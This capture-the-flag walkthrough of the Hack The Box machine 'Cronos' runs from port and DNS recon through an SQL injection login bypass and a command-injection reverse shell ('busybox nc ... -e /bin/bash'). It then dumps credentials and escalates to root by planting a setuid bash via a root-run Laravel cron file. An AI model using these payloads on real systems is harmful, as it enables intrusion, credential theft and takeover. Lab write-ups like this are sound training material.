Cronos

Recon

nmap_scan.log
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
I scanned ports so fast, even my computer was surprised.

[~] The config file is expected to be at "/home/rustscan/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.129.227.211:22
Open 10.129.227.211:53
Open 10.129.227.211:80
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -vvv -sV -sC -Pn" on ip 10.129.227.211
Depending on the complexity of the script, results may take some time to appear.
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2024-11-26 21:25 UTC
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:25
Completed NSE at 21:25, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:25
Completed NSE at 21:25, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:25
Completed NSE at 21:25, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 21:25
Completed Parallel DNS resolution of 1 host. at 21:25, 0.04s elapsed
DNS resolution of 1 IPs took 0.04s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 21:25
Scanning 10.129.227.211 [3 ports]
Discovered open port 53/tcp on 10.129.227.211
Discovered open port 80/tcp on 10.129.227.211
Discovered open port 22/tcp on 10.129.227.211
Completed Connect Scan at 21:25, 0.07s elapsed (3 total ports)
Initiating Service scan at 21:25
Scanning 3 services on 10.129.227.211
Completed Service scan at 21:25, 6.21s elapsed (3 services on 1 host)
NSE: Script scanning 10.129.227.211.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:25
Completed NSE at 21:25, 8.41s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:25
Completed NSE at 21:25, 0.32s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:25
Completed NSE at 21:25, 0.00s elapsed
Nmap scan report for 10.129.227.211
Host is up, received user-set (0.072s latency).
Scanned at 2024-11-26 21:25:38 UTC for 15s

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCkOUbDfxsLPWvII72vC7hU4sfLkKVEqyHRpvPWV2+5s2S4kH0rS25C/R+pyGIKHF9LGWTqTChmTbcRJLZE4cJCCOEoIyoeXUZWMYJCqV8crflHiVG7Zx3wdUJ4yb54G6NlS4CQFwChHEH9xHlqsJhkpkYEnmKc+CvMzCbn6CZn9KayOuHPy5NEqTRIHObjIEhbrz2ho8+bKP43fJpWFEx0bAzFFGzU0fMEt8Mj5j71JEpSws4GEgMycq4lQMuw8g6Acf4AqvGC5zqpf2VRID0BDi3gdD1vvX2d67QzHJTPA5wgCk/KzoIAovEwGqjIvWnTzXLL8TilZI6/PV8wPHzn
|   256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKWsTNMJT9n5sJr5U1iP8dcbkBrDMs4yp7RRAvuu10E6FmORRY/qrokZVNagS1SA9mC6eaxkgW6NBgBEggm3kfQ=
|   256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHBIQsAL/XR/HGmUzGZgRJe/1lQvrFWnODXvxQ1Dc+Zx
53/tcp open  domain  syn-ack ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp open  http    syn-ack Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:25
Completed NSE at 21:25, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:25
Completed NSE at 21:25, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:25
Completed NSE at 21:25, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.41 seconds

DNS

└─$ dig ANY 10.129.227.211 @10.129.227.211
;; communications error to 10.129.227.211#53: timed out
;; communications error to 10.129.227.211#53: timed out
;; communications error to 10.129.227.211#53: timed out

; <<>> DiG 9.19.21-1-Debian <<>> ANY 10.129.227.211 @10.129.227.211
;; global options: +cmd
;; no servers could be reached

└─$ dig -x 10.129.227.211 @10.129.227.211

; <<>> DiG 9.19.21-1-Debian <<>> -x 10.129.227.211 @10.129.227.211
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 24675
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 2

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;211.227.129.10.in-addr.arpa.   IN      PTR

;; ANSWER SECTION:
211.227.129.10.in-addr.arpa. 604800 IN  PTR     ns1.cronos.htb.

;; AUTHORITY SECTION:
129.10.in-addr.arpa.    604800  IN      NS      ns1.cronos.htb.

;; ADDITIONAL SECTION:
ns1.cronos.htb.         604800  IN      A       10.10.10.13

;; Query time: 72 msec
;; SERVER: 10.129.227.211#53(10.129.227.211) (UDP)
;; WHEN: Tue Nov 26 16:26:16 EST 2024
;; MSG SIZE  rcvd: 114

└─$ dig ANY cronos.htb @10.129.227.211

; <<>> DiG 9.19.21-1-Debian <<>> ANY cronos.htb @10.129.227.211
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 36564
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 0, ADDITIONAL: 2

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;cronos.htb.                    IN      ANY

;; ANSWER SECTION:
cronos.htb.             604800  IN      SOA     cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb.             604800  IN      NS      ns1.cronos.htb.
cronos.htb.             604800  IN      A       10.10.10.13

;; ADDITIONAL SECTION:
ns1.cronos.htb.         604800  IN      A       10.10.10.13

;; Query time: 76 msec
;; SERVER: 10.129.227.211#53(10.129.227.211) (TCP)
;; WHEN: Tue Nov 26 16:31:32 EST 2024
;; MSG SIZE  rcvd: 131

HTTP (80)

Writeup.png

Directory enumeration returns nothing

└─$ feroxbuster -u 'http://cronos.htb/' -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt

Subdomain enumeration shows other subdomains

└─$ domain='cronos.htb'; ffuf -u "http://$domain/" -H "Host: FUZZ.$domain" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -mc all -fl 380
       v2.1.0-dev
________________________________________________
admin                   [Status: 200, Size: 1547, Words: 525, Lines: 57, Duration: 105ms]
www                     [Status: 200, Size: 2319, Words: 990, Lines: 86, Duration: 3917ms]

SQLi

Writeup-1.png

Using basic SQLi we are able to login (anything for password)

admin' -- -
Writeup-2.png

This looked like Command Injection, so if we try basic payload it's a success.

Command Injection

Writeup-3.png

Get reverse shell:

8.8.8.8; busybox nc 10.10.14.99 4444 -e /bin/bash; 
└─$ listen
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.129.227.211:41234.
script /dev/null -qc /bin/bash
www-data@cronos:/var/www/admin$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@cronos:/var/www/admin$ cat config.php
<?php
   define('DB_SERVER', 'localhost');
   define('DB_USERNAME', 'admin');
   define('DB_PASSWORD', 'kEjdbRigfBHUREiNSDs');
   define('DB_DATABASE', 'admin');
   $db = mysqli_connect(DB_SERVER,DB_USERNAME,DB_PASSWORD,DB_DATABASE);
?>
www-data@cronos:/var/www/admin$ mysql -u admin -p'kEjdbRigfBHUREiNSDs' -e 'SHOW DATABASES;'
mysql: [Warning] Using a password on the command line interface can be insecure.
+--------------------+
| Database           |
+--------------------+
| information_schema |
| admin              |
+--------------------+
www-data@cronos:/var/www/admin$ mysql -u admin -p'kEjdbRigfBHUREiNSDs' admin -e 'SHOW TABLES;'
mysql: [Warning] Using a password on the command line interface can be insecure.
+-----------------+
| Tables_in_admin |
+-----------------+
| users           |
+-----------------+
www-data@cronos:/var/www/admin$ mysql -u admin -p'kEjdbRigfBHUREiNSDs' admin -e 'SELECT * FROM users;'
mysql: [Warning] Using a password on the command line interface can be insecure.
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
|  1 | admin    | 4f5fffa7b2340178a716e3832451e058 |
+----+----------+----------------------------------+

https://md5hashing.net/hash/md5/4f5fffa7b2340178a716e3832451e058

Creds: admin:1327663704

There's only 3 users with shell access.

www-data@cronos:/var/www/admin$ cat /etc/passwd | grep sh$
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/bin/bash
noulis:x:1000:1000:Noulis Panoulis,,,:/home/noulis:/bin/bash

SSH doesn't work with credentials.

Cronjob

There seems to be Laravel cronjob running as root every minute

www-data@cronos:/var/www/admin$ cat /etc/crontab
...
* * * * *       root    php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1

Method 1

www-data@cronos:/var/www/laravel$ mv artisan artisan.bak
www-data@cronos:/var/www/laravel$ echo '<?=`install -m4777 /bin/bash /tmp/rootbash`?>' > artisan
www-data@cronos:/var/www/laravel$ chmod +x artisan
www-data@cronos:/var/www/laravel$ ls -alh /tmp 
www-data@cronos:/var/www/laravel$ ls /tmp -alh
...
-rwsrwxrwx  1 root root 1014K Nov 26 23:51 rootbash
...
www-data@cronos:/var/www/laravel$ /tmp/rootbash -p
rootbash-4.3# id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)

Method 2

Follow the docs https://laravel.com/docs/11.x/scheduling#defining-schedules

www-data@cronos:/var/www/laravel/app/Console$ cat Kernel.php
<?php

namespace App\Console;

use Illuminate\Console\Scheduling\Schedule;
use Illuminate\Foundation\Console\Kernel as ConsoleKernel;

class Kernel extends ConsoleKernel
{
    /**
     * The Artisan commands provided by your application.
     *
     * @var array
     */
    protected $commands = [
        //
    ];

    /**
     * Define the application's command schedule.
     *
     * @param  \Illuminate\Console\Scheduling\Schedule  $schedule
     * @return void
     */
    protected function schedule(Schedule $schedule)
    {
        // $schedule->command('inspire')
        //          ->hourly();
    }

    /**
     * Register the Closure based commands for the application.
     *
     * @return void
     */
    protected function commands()
    {
        require base_path('routes/console.php');
    }
}

Needed code can be reduced to

<?php
namespace App\Console;
use Illuminate\Console\Scheduling\Schedule;
use Illuminate\Foundation\Console\Kernel as ConsoleKernel;
class Kernel extends ConsoleKernel {
    protected $commands = [];

    protected function schedule(Schedule $schedule) {
        $schedule->exec('install -m4777 /bin/bash /tmp/rootbash2')->everyMinute();
    }

    protected function commands() { require base_path('routes/console.php'); }
}

Because Im on simple netcat shell I think if I use editors it may crash and kill shell at all, so I'll just use base64 to transfer the code.

www-data@cronos:/var/www/laravel/app/Console$ mv Kernel.php Kernel.php.bak
www-data@cronos:/var/www/laravel/app/Console$ base64 -d <<<'PD9waHANCm5hbWVzcGFjZSBBcHBcQ29uc29sZTsNCnVzZSBJbGx1bWluYXRlXENvbnNvbGVcU2NoZWR1bGluZ1xTY2hlZHVsZTsNCnVzZSBJbGx1bWluYXRlXEZvdW5kYXRpb25cQ29uc29sZVxLZXJuZWwgYXMgQ29uc29sZUtlcm5lbDsNCmNsYXNzIEtlcm5lbCBleHRlbmRzIENvbnNvbGVLZXJuZWwgew0KICAgIHByb3RlY3RlZCAkY29tbWFuZHMgPSBbXTsNCg0KICAgIHByb3RlY3RlZCBmdW5jdGlvbiBzY2hlZHVsZShTY2hlZHVsZSAkc2NoZWR1bGUpIHsNCiAgICAgICAgJHNjaGVkdWxlLT5leGVjKCdpbnN0YWxsIC1tNDc3NyAvYmluL2Jhc2ggL3RtcC9yb290YmFzaDInKS0+ZXZlcnlNaW51dGUoKTsNCiAgICB9DQoNCiAgICBwcm90ZWN0ZWQgZnVuY3Rpb24gY29tbWFuZHMoKSB7IHJlcXVpcmUgYmFzZV9wYXRoKCdyb3V0ZXMvY29uc29sZS5waHAnKTsgfQ0KfQ0K' > Kernel.php
...
www-data@cronos:/var/www/laravel/app/Console$ ls -alh /tmp/rootbash2
-rwsrwxrwx 1 root root 1014K Nov 27 00:11 /tmp/rootbash2
www-data@cronos:/var/www/laravel/app/Console$ /tmp/rootbash2 -p
rootbash2-4.3# id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)

Flags

rootbash-4.3# cat /home/*/user.txt /root/root.txt
ed70d2e6e37a9e48aa988194bd816d8c
3240644cb49318f82bc4735ee79a2d28
PreviousCozyHostingNextCybermonday

Last updated